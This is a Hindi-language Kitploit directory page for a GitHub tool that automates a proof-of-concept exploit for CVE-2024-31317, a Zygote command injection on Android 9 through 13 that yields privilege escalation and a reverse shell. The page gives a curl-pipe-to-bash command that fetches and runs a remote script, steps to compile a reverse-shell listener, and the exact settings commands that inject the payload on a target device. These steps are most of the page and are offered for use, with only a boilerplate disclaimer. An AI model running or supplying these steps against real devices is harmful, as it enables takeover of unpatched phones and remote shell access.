Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-31317-PoC-Deployer — CVE-2024-31317 PoC के लिए स्वचालित तैनाती उपकरण, Android 9-13 पर, जो Zygote इंजेक्शन और रिवर्स शेल निष्पादन के माध्यम से विशेषाधिकार वृद्धि को सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/webldix/cve-2024-31317-poc-deployer
एंड्रॉइड सुरक्षाविशेषाधिकार वृद्धिशोषणशेलकोडपेनिट्रेशन टेस्टिंगमोबाइल सुरक्षापेलोड डेवलपमेंटबाइनरी शोषण

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
webldix/cve-2024-31317-poc-deployer

CVE-2024-31317-PoC-Deployer

CVE-2024-31317 PoC के लिए स्वचालित तैनाती उपकरण, Android 9-13 पर, जो Zygote इंजेक्शन और रिवर्स शेल निष्पादन के माध्यम से विशेषाधिकार वृद्धि को सक्षम करता है।

रिपॉजिटरी देखें
528671 साल पहलेKitploit द्वारा समीक्षित

CVE-2024-31317-PoC-Deployer

Android Version Patch Level License

Android 9 से 13 तक के उपकरणों को लक्षित करने वाले CVE-2024-31317 प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट के लिए एक परिनियोजन उपकरण।

📝 परियोजना विवरण

CVE-2024-31317-PoC-Deployer एक स्वचालित परिनियोजन स्क्रिप्ट है, जो CVE-2024-31317 भेद्यता शोषण के लिए आवश्यक सभी फ़ाइलों को शीघ्रता से उत्पन्न और कॉन्फ़िगर करने के लिए उपयोग की जाती है। यह भेद्यता Android 9 से 13 के उपकरणों को प्रभावित करती है, जो Zygote प्रक्रिया के माध्यम से विशेषाधिकार वृद्धि और मनमाने कोड के निष्पादन की अनुमति देती है।

🚨 भेद्यता जानकारी

  • CVE ID: CVE-2024-31317
  • प्रभावित क्षेत्र: Android 9 से Android 13
  • सुधार संस्करण: जून 2024 पैच स्तर और उसके बाद के Android संस्करण
  • भेद्यता प्रकार: Zygote प्रक्रिया कमांड इंजेक्शन
  • आवश्यक अनुमति: WRITE_SECURE_SETTINGS

📦 शामिल फ़ाइलें

  • reverse_shell.c - C भाषा में लिखा गया रिवर्स शेल प्रोग्राम
  • payload.txt - विशेष रूप से निर्मित शोषण पेलोड
  • compile.sh - स्वचालित संकलन स्क्रिप्ट
  • README.txt - विस्तृत उपयोग निर्देश
  • CVE-2024-31317.txt - भेद्यता तकनीकी विश्लेषण दस्तावेज़

🛠️ त्वरित आरंभ

  1. दूरस्थ परिनियोजन स्क्रिप्ट चलाएँ:

    root@kitploit:~
    pkg install -y curl ; bash -c "$(curl -L https://ghfast.top/https://github.com/Webldix/CVE-2024-31317-PoC-Deployer/blob/main/Android_Zygote_Research_Kit.sh)"
    
  2. रिवर्स शेल संकलित करें:

    root@kitploit:~
    sh compile.sh
    
  3. रिवर्स शेल श्रोता चलाएँ:

    root@kitploit:~
    sh reverse_shell
    

💣 शोषण चरण

  1. payload.txt को लक्ष्य उपकरण के /data/local/tmp/ पर अपलोड करें
  2. payload.txt में xxx.xxx.xxx को अपने श्रोता सर्वर IP से बदलें
  3. लक्ष्य उपकरण पर निम्नलिखित कमांड अनुक्रम निष्पादित करें:
    root@kitploit:~
    am force-stop com.android.settings
    cd /data/local/tmp/
    settings put global hidden_api_blacklist_exemptions "$(cat payload.txt)"
    am start -n com.android.settings/.Settings
    settings put global hidden_api_blacklist_exemptions "null"
    

⚠️ अस्वीकरण

यह उपकरण केवल वैध सुरक्षा परीक्षण और शोध उद्देश्यों के लिए है। उपयोग से पहले लक्ष्य प्रणाली से स्पष्ट प्राधिकरण प्राप्त करना अनिवार्य है। अनधिकृत उपयोग कानून का उल्लंघन हो सकता है। डेवलपर किसी भी दुरुपयोग के लिए उत्तरदायी नहीं है।

📜 लाइसेंस

यह परियोजना MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

📚 तकनीकी संदर्भ

  • Android सुरक्षा बुलेटिन - जून 2024
  • CVE-2024-31317 विवरण
टूल डाउनलोड करें